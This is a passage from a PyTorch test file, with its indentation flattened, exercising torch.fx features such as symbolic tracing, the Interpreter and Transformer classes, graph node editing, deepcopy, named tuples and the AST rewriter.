rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_interpreter_default_args(self):
class Model(torch.nn.Module):
def forward(self, x, y=3.14159):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
out = interp.run(x)
torch.testing.assert_allclose(out, x + 3.14159)
def test_interpreter_not_enough_args(self):
class Model(torch.nn.Module):
def forward(self, x, y):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
with self.assertRaisesRegex(RuntimeError,
'Expected positional argument for parameter y, but one was not passed in'):
out = interp.run(x)
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
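# Same sigmoid/neg swap as the Interpreter version above, but Transformer
# materializes a new GraphModule with the substituted ops.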
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
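# Also exercise the traced module against the eager module; x and w are
# otherwise unused.
self.assertEqual(traced(x, w), f(x, w))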
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
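# Build a relu chain deeper than the recursion limit; deepcopying the Graph
# should not raise RecursionError, and each node's users should map cleanly
# onto the copied nodes.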
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# torch.neg has no in-place variant, so drop the `inplace` kwarg
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
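# replace_input_with rewires the relu node from the x placeholder to y;
# x remains in the graph as an unused placeholder, so the module still
# accepts two inputs.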
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
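# Node.update_arg mutates the relu node's positional argument in place;
# constructing a new GraphModule from the same Graph reflects the change.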
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_prepend_self(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.prepend(b)
x.append(b)
self.assertEqual(len(graph.nodes), 3)
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_named_tuple_inlined(self):
class NamedTupMod(torch.nn.Module):
def forward(self, inp):
return wrapped_named_tup(Pair(inp, 1.2), p2=Pair(3.4, inp))
m = NamedTupMod()
input = torch.rand(3, 4)
ref = m(input)
traced = symbolic_trace(m)
res = traced(input)
self.assertEqual(ref, res)
# Check Pair NamedTuple works when inlined into the function call.
ph = call_func = None
for node in traced.graph.nodes:
if node.op == "placeholder":
ph = node
elif node.op == "call_function" and node.target == wrapped_named_tup:
node.update_arg(0, Pair(ph, 1.2))
node.update_kwarg("p2", Pair(3.4, ph))
call_func = node
break
self.assertTrue(call_func is not None)
self.assertTrue(isinstance(call_func.args[0], Pair))
self.assertTrue(isinstance(call_func.kwargs["p2"], Pair))
self.assertEqual(_format_arg(call_func.args[0]), "Pair(x=%inp, y=1.2)")
self.assertEqual(_format_arg(call_func.kwargs["p2"]), "Pair(x=3.4, y=%inp)")
traced.graph.eliminate_dead_code()
traced.recompile()
res = traced(input)
self.assertEqual(ref, res)
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
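# The profiler enter/exit ops are side-effectful, so eliminate_dead_code
# must not prune them even though their results are unused.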
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
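# Helpers: parameter/buffer existence is verified both via the named_*
# iterators and via the state_dict; module existence only needs named_modules.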
def module_exists(gm: GraphModule, path: str) -> bool:
